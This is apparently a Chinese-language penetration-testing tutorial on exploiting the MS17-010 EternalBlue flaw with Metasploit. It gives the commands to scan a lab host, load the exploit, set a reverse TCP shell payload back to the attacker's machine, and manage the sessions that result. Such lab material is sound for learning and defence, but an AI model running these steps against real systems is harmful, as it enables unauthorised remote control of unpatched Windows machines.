实战 - 利用ms17-010永恒之蓝漏洞

扫描目标是否存在该漏洞

search ms17-010
kali渗透测试日记 - 通过Metasploit利用ms17-010永恒之蓝漏洞_后台执行
找到其中的辅助扫描模块并载入

use auxiliary/scanner/smb/smb_ms17_010 show options # 查看使用的参数选项 

kali渗透测试日记 - 通过Metasploit利用ms17-010永恒之蓝漏洞_后台执行_02
可见需要RHOSTS参数(即远程主机的IP),这里假设为192.168.1.56

set rhosts 192.168.1.56
开始扫描
run

kali渗透测试日记 - 通过Metasploit利用ms17-010永恒之蓝漏洞_目标系统_03

发现目标易受攻击,存在相关漏洞。

攻击模块加载与配置

查找攻击模块(永恒之蓝)并加载

kali渗透测试日记 - 通过Metasploit利用ms17-010永恒之蓝漏洞_目标系统_04

search ms17-010 
use exploit/windows/smb/ms17_010_eternalblue 
show options 

kali渗透测试日记 - 通过Metasploit利用ms17-010永恒之蓝漏洞_ico_05
需要设置目标主机IP地址 RHOSTS
set RHOSTS 192.168.1.56
查看可以利用的目标主机类型
show targets

kali渗透测试日记 - 通过Metasploit利用ms17-010永恒之蓝漏洞_目标系统_06
可以看到这个模块只有一个 target,所以默认就选择这个目标系统。不需要手动设置。

search windows/x64/shell type:payload

kali渗透测试日记 - 通过Metasploit利用ms17-010永恒之蓝漏洞_后台执行_07

选择其中的第3个:反弹shell的payload。加载:

set payload windows/x64/shell/reverse_tcp

查看payload需要配置的信息

show options

kali渗透测试日记 - 通过Metasploit利用ms17-010永恒之蓝漏洞_ico_08
设置本机的监听地址LHOST

set LHOST 192.168.1.53

配置完成,开始运行

exploit

(敲回车)等待反弹shell
kali渗透测试日记 - 通过Metasploit利用ms17-010永恒之蓝漏洞_后台执行_09

解决回显乱码问题

在Win7的shell中利用chcp命令更改编码为65001即Unicode (UTF-8)

chcp 65001

保存会话

在执行时,运行

exploit -j

-j 表示后台执行 渗透目标完成后会创建一个 session 我们可以通过 session 连接目标主机。
查看sessions会话

sessions

通过id进入相应的session

sessions -i [Id]

保存到后台

background

结束会话

sessons -k [Id]

在获取会话后,如果没有回显,可以敲一下回车

MSF攻击步骤

1、查找 CVE 公布的漏洞
2、查找对应的 exploit 模块
3、配置模块参数
4、添加 payload 后门
5、执行 exploit 开始攻击